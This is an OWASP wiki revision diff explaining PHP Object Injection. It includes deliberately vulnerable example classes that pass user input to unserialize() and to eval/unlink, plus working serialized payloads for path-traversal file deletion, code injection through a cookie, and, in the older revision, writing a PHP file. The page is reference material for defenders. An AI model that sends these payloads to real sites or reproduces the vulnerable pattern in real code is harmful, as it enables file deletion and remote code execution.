Difference between revisions of "PHP Object Injection"

From OWASP
Jump to: navigation, search
(Created page with "{{Template:Vulnerability}} Author(s): *Egidio Romano Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}''' [[ASDR_TOC_V...")
 
(2 intermediate revisions by one user not shown)
Line 11: Line 11:
  
 
PHP Object Injection is an application level vulnerability which allows an attacker to perform different kinds of malicious attacks.
 
PHP Object Injection is an application level vulnerability which allows an attacker to perform different kinds of malicious attacks.
The vulnerability occurs when user-supplied input is not properly sanitized before being used in call to the unserialize() PHP function. Since PHP allows objects serialization, attackers  could pass ad-hoc serialized strings to the unserialize() function, resulting in an arbitrary PHP objects injection into the application scope.
+
The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers  could pass ad-hoc serialized strings to a vulnerable unserialize() function resulting in an arbitrary PHP object(s) injection into the application scope.
  
 
In order to successfully exploit a PHP Object Injection vulnerability two conditions must be satisfied:
 
In order to successfully exploit a PHP Object Injection vulnerability two conditions must be satisfied:
  
 
* The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be abused to conduct malicious attacks.
 
* The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be abused to conduct malicious attacks.
* That exploitable class must be declared when unserialize() is being called, otherwise object autoloading must be supported.
+
* That exploitable class must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for that class.
  
 
==Risk Factors==
 
==Risk Factors==
  
 
* The impact of this vulnerability could be High but the likelihood is low. So, the severity of this type of vulnerability is Medium.
 
* The impact of this vulnerability could be High but the likelihood is low. So, the severity of this type of vulnerability is Medium.
* This vulnerability can make the website vulnerable to some other types of attacks such as [[Path Traversal]], [[SQL Injection]] or [[Code Injection]].
+
* This vulnerability can make the application vulnerable to some kinds of attacks such as [[Path Traversal]], [[SQL Injection]] or [[Code Injection]].
  
 
==Examples==
 
==Examples==
 +
 +
'''Example 1'''
  
 
The example below shows a PHP class with an exploitable __destruct method:
 
The example below shows a PHP class with an exploitable __destruct method:
Line 29: Line 31:
 
<?php
 
<?php
  
class VulnCache
+
class Example1
 
{
 
{
 
   public $cache_file;
 
   public $cache_file;
  public $cache_data;
 
  
 
   function __construct()
 
   function __construct()
Line 41: Line 42:
 
   function __destruct()
 
   function __destruct()
 
   {
 
   {
       file_put_contents($this->cache_file, $this->cache_data);
+
       $file = "/var/www/cache/tmp/{$this->cache_file}";
 +
      if (file_exists($file)) @unlink($file);
 
   }
 
   }
 
}
 
}
Line 48: Line 50:
  
 
$user_data = unserialize($_GET['data']);
 
$user_data = unserialize($_GET['data']);
 +
 +
// some PHP code...
  
 
?>
 
?>
 
</pre>
 
</pre>
In this example an attacker might be able to create a new PHP file with arbitrary code, requesting the following URL:
+
In this example an attacker might be able to delete an arbitrary file via a [[Path Traversal]] attack, for e.g. requesting the following URL:
<pre>http://site/vuln.php?data=O:9:"VulnCache":2:{s:10:"cache_file";s:8:"test.php";s:10:"cache_data";s:21:"<?php+evil_code();+?>";}</pre>
+
<pre>http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}</pre>
 +
 
 +
'''Example 2'''
 +
 
 +
The example below shows a PHP class with an exploitable __wakeup method:
 +
<pre>
 +
<?php
 +
 
 +
class Example2
 +
{
 +
  private $hook;
 +
 
 +
  function __construct()
 +
  {
 +
      // some PHP code...
 +
  }
 +
 
 +
  function __wakeup()
 +
  {
 +
      if (isset($this->hook)) eval($this->hook);
 +
  }
 +
}
 +
 
 +
// some PHP code...
 +
 
 +
$user_data = unserialize($_COOKIE['data']);
 +
 
 +
// some PHP code...
 +
 
 +
?>
 +
</pre>
 +
In this example an attacker might be able to perform a [[Code Injection]] attack by sending an HTTP request like this:
 +
<pre>
 +
GET /vuln.php HTTP/1.0
 +
Host: testsite.com
 +
Cookie: data=O%3A8%3A%22Example2%22%3A1%3A%7Bs%3A14%3A%22%00Example2%00hook%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D
 +
Connection: close
 +
</pre>
  
 
==Related [[Vulnerabilities]]==
 
==Related [[Vulnerabilities]]==

Revision as of 00:15, 22 January 2013

This is a Vulnerability. To view all vulnerabilities, please see the Vulnerability Category page.


Author(s):

Last revision (mm/dd/yy): 01/22/2013

Vulnerabilities Table of Contents

Description

PHP Object Injection is an application level vulnerability which allows an attacker to perform different kinds of malicious attacks. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() function resulting in an arbitrary PHP object(s) injection into the application scope.

In order to successfully exploit a PHP Object Injection vulnerability two conditions must be satisfied:

  • The application must have a class which implements a PHP magic method (such as __wakeup or __destruct) that can be abused to conduct malicious attacks.
  • That exploitable class must be declared when the vulnerable unserialize() is being called, otherwise object autoloading must be supported for that class.

Risk Factors

  • The impact of this vulnerability could be High but the likelihood is low. So, the severity of this type of vulnerability is Medium.
  • This vulnerability can make the application vulnerable to some kinds of attacks such as Path Traversal, SQL Injection or Code Injection.

Examples

Example 1

The example below shows a PHP class with an exploitable __destruct method:

<?php

class Example1
{
   public $cache_file;

   function __construct()
   {
      // some PHP code...
   }

   function __destruct()
   {
      $file = "/var/www/cache/tmp/{$this->cache_file}";
      if (file_exists($file)) @unlink($file);
   }
}

// some PHP code...

$user_data = unserialize($_GET['data']);

// some PHP code...

?>

In this example an attacker might be able to delete an arbitrary file via a Path Traversal attack, for e.g. requesting the following URL:

http://testsite.com/vuln.php?data=O:8:"Example1":1:{s:10:"cache_file";s:15:"../../index.php";}

Example 2

The example below shows a PHP class with an exploitable __wakeup method:

<?php

class Example2
{
   private $hook;

   function __construct()
   {
      // some PHP code...
   }

   function __wakeup()
   {
      if (isset($this->hook)) eval($this->hook);
   }
}

// some PHP code...

$user_data = unserialize($_COOKIE['data']);

// some PHP code...

?>

In this example an attacker might be able to perform a Code Injection attack by sending an HTTP request like this:

GET /vuln.php HTTP/1.0
Host: testsite.com
Cookie: data=O%3A8%3A%22Example2%22%3A1%3A%7Bs%3A14%3A%22%00Example2%00hook%22%3Bs%3A10%3A%22phpinfo%28%29%3B%22%3B%7D
Connection: close

Related Vulnerabilities

Related Controls

Prevention

Do not use unserialize() function with user-supplied input, use JSON functions instead.

References